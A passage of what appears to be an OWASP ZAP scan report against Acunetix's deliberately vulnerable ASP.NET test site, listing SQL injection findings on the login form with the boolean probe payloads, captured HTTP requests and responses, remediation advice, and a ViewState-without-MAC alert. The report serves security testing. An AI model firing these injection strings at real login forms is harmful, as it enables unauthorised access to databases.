align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter idAttack 4-2Solution Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the principle of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
POST http://testaspnet.vulnweb.com/login.aspx
Alert tags Alert description SQL injection may be possible.
Other info The page results were successfully manipulated using the boolean conditions [ZAP' AND '1'='1' -- ] and [ZAP' OR '1'='1' -- ]
The parameter value being modified was stripped from the HTML output for the purposes of the comparison
Data was NOT returned for the original parameter.
The vulnerability was detected by successfully retrieving more data than originally returned, by manipulating the parameter
Request Request line and header section (397 bytes)
POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/login.aspx Content-Length: 1226 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (1226 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8xY%2BHkfERpF5ijDSZsRL1CxlmHEA%3D%3D&tbUsername=ZAP%27+AND+%271%27%3D%271%27+--+&tbPassword=ZAP&cbPersistCookie=on&btnLogin=LoginResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:08:04 GMT Content-Length: 13298Response body (13298 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="ZAP' AND '1'='1' -- " id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter tbUsernameAttack ZAP' OR '1'='1' --Solution Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the principle of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
-
-
-
Risk=高等的, Confidence=低 (15)
-
http://testaspnet.vulnweb.com (15)
-
Viewstate without MAC Signature (Unsure) (15)
GET http://testaspnet.vulnweb.com
Alert tags Alert description *** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request Request line and header section (211 bytes)
GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cacheRequest body (0 bytes)
Response Status line and header section (296 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:16 GMT Content-Length: 13912Response body (13912 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" 